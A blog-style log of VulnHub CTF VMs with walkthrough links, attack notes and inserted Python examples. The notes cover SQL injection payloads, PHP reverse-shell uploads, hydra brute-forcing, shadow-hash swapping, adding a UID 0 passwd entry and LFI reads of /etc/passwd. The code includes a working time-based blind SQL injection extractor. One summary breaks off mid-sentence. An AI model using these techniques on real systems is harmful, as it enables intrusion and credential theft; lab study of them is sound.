
Showing posts from August, 2018

39 VM : HackDay: Albania

https://www.vulnhub.com/entry/hackday-albania,167/

Walkthru:
A. https://github.com/DavidBrosnan/Walkthroughs/wiki/Hackday-Albania [directory hopping using wfuzz, SQL injection, sqlmap, file-type restriction on upload bypassed by uploading a PHP reverse shell as .jpg, msfvenom, meterpreter, no python 2.7 or gcc on the target, password in config.php, mysql> prompt, SELECT ... INTO OUTFILE from mysql, writable passwd file, adding a root user/password to the passwd file]
B. http://security-geek.in/2017/02/08/vulnhub-hack-a-day-albania/ []
C. https://g0blin.co.uk/albania-vulnhub-writeup/ [dirsearch, sqlmap time-based blind attack, why the username field is susceptible to injection while the password field isn't, port forward through our meterpreter session]

Notes:
Walkthru C: I note in sqlmap that we were redirected to index.php when triggering the payload. Let's try entering the generated payload of username=test' RLIKE SLEEP(5)-- smYE as our username, and see why we're being redirected
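The sqlmap payload quoted above is a time-based blind injection, and the note that every attempt is redirected to index.php is exactly the situation a timing oracle is for: no error text or page content is needed, only the response delay. The following is an added example, not code from the VM or from any of the walkthroughs. It builds a small, deliberately injectable login on SQLite, registers a stand-in SLEEP() so the same trick runs offline, and extracts a value character by character from the delay alone. Two assumptions: SQLite has no RLIKE, so the payload uses CASE WHEN ... THEN SLEEP() instead of the page's RLIKE SLEEP(5); and the password is hashed before it reaches the query, which is one common reason a password field is not injectable while the username field is (the page does not say what this VM actually does).

```python
"""Time-based blind SQL injection against a toy login (added example).

The login below is deliberately vulnerable: the username is concatenated
into the SQL string, while the password is MD5-hashed first (assumption),
so quotes in the password never reach the query.  SQLite lacks MySQL's
SLEEP(), so one is registered as a user-defined function.
"""
import hashlib
import sqlite3
import string
import time

DELAY = 0.5            # seconds the injected SLEEP() stalls a true guess
THRESHOLD = DELAY / 2  # anything slower than this is treated as "true"


def _sleep(seconds):
    """Stand-in for MySQL's SLEEP(); registered on the connection below."""
    time.sleep(seconds)
    return 0


def make_db():
    """Constructed sample database (not the VM's): one user row."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, _sleep)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.md5(b"s3cret").hexdigest()))
    return conn


def vulnerable_login(conn, username, password):
    """Deliberately injectable through `username` only."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = ("SELECT 1 FROM users WHERE username = '" + username +
             "' AND password = '" + pw_hash + "'")
    return conn.execute(query).fetchone() is not None


def query_is_slow(conn, username):
    """The oracle: did the login take noticeably longer than normal?"""
    start = time.monotonic()
    vulnerable_login(conn, username, "irrelevant")
    return time.monotonic() - start > THRESHOLD


def extract_via_timing(conn, subquery, alphabet=string.ascii_lowercase,
                       max_len=16):
    """Recover the result of `subquery` one character at a time, using
    only the response delay.  A guess that is correct makes the server
    SLEEP(); a wrong guess returns immediately.  An empty substr() at the
    end of the string matches nothing, which terminates the loop."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = ("x' OR (CASE WHEN substr((%s), %d, 1) = '%s' "
                       "THEN SLEEP(%s) ELSE 0 END)-- "
                       % (subquery, pos, ch, DELAY))
            if query_is_slow(conn, payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of string
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(extract_via_timing(db, "SELECT username FROM users LIMIT 1"))
```

The `-- ` at the end of the payload comments out the rest of the statement, including the password comparison, which is why the same trick also logs in as `admin'-- ` with any password. Because the oracle is the delay, it keeps working when the application answers every request with the same redirect, which is the case the note above runs into.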

38 VM : d0not5top: 1.2

https://www.vulnhub.com/?q=D0Not5top&sort=date-des&type=vm

Walkthru:
A. https://github.com/Hamza-Megahed/CTFs/blob/master/d0not5top/README [Burp proxy; adding hostnames to /etc/hosts shows the following, but it is not working for me and is not showing the localhost stuff:
$ dirb http://172.16.34.163/control/ -X .txt,.php,.html
+ http://172.16.34.163/control/hosts.txt
127.0.0.1 localhost
127.0.0.1 D0Not5top.ctf
#127.0.0.1       MadBroAdN1n.ctf ## AD105 M0F05]
B. https://adaywithtape.blogspot.com/2017/04/vulnhub-d0not5top-writeup.html [use the nc command to get the flag and the echo command to decode it, wfuzz, virtual host, partially binary string, Google Translate, curl with a --header Host request, additional domains, OWASP ZAP, exiftool, HD, hash64]
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 192.168.56.102/FUZZ
Changing the syntax just a tad to only show HTTP 200 codes and be recursive down to 3 directories gives a clearer view of none

37 VM : LazySysAdmin

https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1

Walkthru:
- scan shows ssh, http, smb, sql and irc ports.
- tried to access the smb share and copy files to the target, but it looks like the share is accessible but not writable.
- couldn't find anything interesting in http.
- ran hydra on ssh and found the password for togie.
- restricted shell but full su access, so copied the shadow and passwd files to Kali to crack them using john, but it had not completed after at least an hour:
root@localhost:~/freshly# unshadow passwd shadow > cracked.txt
root@localhost:~/freshly# john cracked.txt
Created directory: /root/.john
- so changed the root password hash in the shadow file to be the same as togie's, su'd as root, entered the same password and I'm root.

Notes:
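Both this VM and HackDay: Albania above are finished by editing the account files rather than cracking anything: here root's shadow hash is replaced with togie's, and on Albania a new UID 0 line with an inline hash is written into a writable /etc/passwd (via mysql's INTO OUTFILE). The following added example, not code from either walkthrough, is the defender's side of that: an audit that flags extra UID 0 accounts, a hash sitting in passwd's password field (which login honours, bypassing shadow entirely), and two shadow entries sharing one hash. The sample passwd and shadow contents are constructed, the hash values are made up, and the account name togie is reused only because it appears in the notes.

```python
"""Audit passwd/shadow contents for the tampering used in these notes
(added example, constructed sample data)."""
import stat

# Constructed sample: a passwd file after an attacker appended a UID 0
# account with an MD5-crypt style hash inline (the hash is made up).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
togie:x:1000:1000:togie,,,:/home/togie:/bin/bash
hacker:$1$Rv3Qm2s9$7uIh7c9yFj4MbR0XrmY9P1:0:0::/root:/bin/bash
"""

# Constructed sample: root's hash has been overwritten with togie's.
SHADOW_SAMPLE = """\
root:$6$k2LpXw9Q$ZpQm6wE1nR7sTc4vB8yH0jK3uL5xN9oA2dF6gI1hJ4kM7rP0qS3tU5vW8xY1z:17500:0:99999:7:::
daemon:*:17500:0:99999:7:::
togie:$6$k2LpXw9Q$ZpQm6wE1nR7sTc4vB8yH0jK3uL5xN9oA2dF6gI1hJ4kM7rP0qS3tU5vW8xY1z:17500:0:99999:7:::
"""

# Values in passwd's password field that mean "look in shadow" or "locked".
SHADOW_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_colon_file(text):
    """Split a passwd/shadow-style file into field lists, skipping blank
    lines and comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rows.append(line.split(":"))
    return rows


def audit_passwd(text):
    """Return (finding, account) pairs for suspicious passwd entries."""
    findings = []
    for fields in parse_colon_file(text):
        if len(fields) != 7:
            findings.append(("malformed-entry", fields[0]))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(("extra-uid0", name))
        if pw == "":
            findings.append(("empty-password", name))
        elif pw not in SHADOW_OR_LOCKED:
            # A real hash here is used by login; shadow is never consulted.
            findings.append(("hash-in-passwd", name))
    return findings


def audit_shadow(text):
    """Flag accounts whose hashes are byte-for-byte identical: copying a
    known account's hash over root's is the shortcut used on this VM."""
    findings = []
    first_seen = {}
    for fields in parse_colon_file(text):
        name, pw = fields[0], fields[1]
        if not pw.startswith("$"):
            continue  # locked, or no hash at all
        if pw in first_seen:
            findings.append(("shared-hash", tuple(sorted((first_seen[pw], name)))))
        else:
            first_seen[pw] = name
    return findings


def world_writable(mode):
    """True if a file mode (os.stat().st_mode) lets everyone write; a
    world-writable /etc/passwd is what makes the passwd trick possible."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_SAMPLE) + audit_shadow(SHADOW_SAMPLE):
        print(finding)
    # On a live host: world_writable(os.stat("/etc/passwd").st_mode)
```

On a real host, feed the audit the contents of /etc/passwd and /etc/shadow and check the passwd mode with `world_writable(os.stat("/etc/passwd").st_mode)`; for the offensive side, the inline hash for such a passwd line can be produced with `openssl passwd -1`.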

36 VM : CTF_2017_online

Walkthru:
A. https://prasannakumar.in/infosec/vulnhub-ctf-usv-2017-writeup/ [obfuscated JavaScript, which is currently one of the best methods for protecting JavaScript code from reverse engineering; the "var _0xbb15=" gives us a hint, it's in the obfuscated way; deobfuscating using JS Beautifier; vulnerability with the https: site; decode or reverse-engineer the math manually; curl to download an HTML page using a --data (POST) request; LFI, or local file inclusion; curl to read /etc/passwd via the LFI; wfuzz to fuzz/customize the directory structure to download; one can use wget to download the files from the door and vault folders by selecting the --no-directories option so it doesn't create ten thousand directories, but wget didn't stop automatically, it kept on going, maybe it does multiple iterations, not sure; aircrack-ng; looks like a blind SQL injection and we are not getting a response from the SQL injection error or select statement, in that case we know the sql in
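The `var _0xbb15=[...]` pattern the walkthrough points at is a string-array obfuscator: every string literal in the script is moved into one array, usually as `\x..` escapes, and the code refers to them by index (`_0xbb15[0x2]`), so a beautifier alone still leaves the logic unreadable. The following added example, not code from the walkthrough or from the CTF, undoes that statically: it parses the array, decodes the escapes, substitutes each reference with its literal, and turns `console["log"]` back into `console.log`. The snippet it runs on is constructed and the array name is reused only because the note mentions it; real obfuscators often add an array-rotation function that this does not handle.

```python
"""Static deobfuscation of the JavaScript string-array pattern
(added example on a constructed snippet)."""
import json
import re

# Constructed sample, in the shape the walkthrough describes.
OBFUSCATED_JS = (
    r'var _0xbb15=["\x66\x6C\x61\x67","\x6C\x6F\x67","\x48\x65\x6C\x6C\x6F\x2C\x20"];'
    r'function greet(x){if(x==_0xbb15[0x0]){console[_0xbb15[1]](_0xbb15[2]+x)}}'
)

ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\]\s*;', re.S)
STRING_RE = re.compile(r'"((?:\\.|[^"\\])*)"|\'((?:\\.|[^\'\\])*)\'')
SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0", "b": "\b",
                  "f": "\f", "v": "\v", "\\": "\\", '"': '"', "'": "'"}


def decode_js_string(raw):
    """Resolve \\xHH, \\uHHHH and the simple backslash escapes of a JS
    string literal body."""
    out = []
    i = 0
    while i < len(raw):
        c = raw[i]
        if c != "\\":
            out.append(c)
            i += 1
            continue
        nxt = raw[i + 1]
        if nxt == "x":
            out.append(chr(int(raw[i + 2:i + 4], 16)))
            i += 4
        elif nxt == "u":
            out.append(chr(int(raw[i + 2:i + 6], 16)))
            i += 6
        else:
            out.append(SIMPLE_ESCAPES.get(nxt, nxt))
            i += 2
    return "".join(out)


def extract_string_array(js):
    """Return (array_name, decoded_strings) for the first _0x array."""
    m = ARRAY_RE.search(js)
    if not m:
        return None, []
    strings = []
    for lit in STRING_RE.finditer(m.group(2)):
        body = lit.group(1) if lit.group(1) is not None else lit.group(2)
        strings.append(decode_js_string(body))
    return m.group(1), strings


def deobfuscate(js):
    """Inline every _0xNAME[index] reference and drop the array itself."""
    name, strings = extract_string_array(js)
    if name is None:
        return js
    out = ARRAY_RE.sub("", js, count=1)
    ref = re.compile(re.escape(name) + r"\[(0x[0-9a-fA-F]+|\d+)\]")

    def replace(m):
        idx = m.group(1)
        index = int(idx, 16) if idx.startswith("0x") else int(idx)
        return json.dumps(strings[index])  # valid JS string literal

    out = ref.sub(replace, out)
    # obj["name"] -> obj.name when the key is a plain identifier
    out = re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r".\1", out)
    return out.strip()


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED_JS))
```

Run on the sample, the function returns `function greet(x){if(x=="flag"){console.log("Hello, "+x)}}`, which is the point of the exercise: the comparison value and the call target were never hidden, only moved. When the script also rotates the array (a `while(--n){arr.push(arr.shift())}` helper), apply that rotation to the decoded list before substituting.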

34 VM The Wall 1:

Walkthru:
A. https://www.mogozobo.com/?p=2848 [no open ports in the initial port scan, tcpdump to listen to traffic on the network, nc -nvlp 1337 to get the server to connect back, after which additional ports are enabled, a long 74-character string that needed to be decoded using echo and xxd and then the md5 hash reversed, steganography using steghide, sftp (ssh not allowed), file command, scalpel command, uncomment the jpg extension in the scalpel config file and run it in an empty folder]
B. https://highon.coffee/blog/the-wall-walkthrough/ [fatcat, a forensics tool used for recovering / extracting data from FAT16 images]
C. https://www.unlogic.co.uk/2016/06/02/the-wall-vulnhub-walkthrough/ []

Notes: Completed and stopped at phase 2

33 VM : Zorz

Walkthru: https://www.vulnhub.com/?q=zorz&sort=date-asc&type=vm

Notes:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:9A:0D:2F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

None of the walkthroughs shows getting root access, so maybe it is not part of the to-do. The walkthroughs show 3 different ways to get shell access. I got a shell by uploading the reverse shell file via index and browsing to the /upload1 folder. It shows upload3 but not upload1. upload3 doesn't allow anything except pictures, but a gif reverse shell or xxd didn't work either. Tried to run exploits and the privchecker and exploit checker, but they didn't work. No gcc on se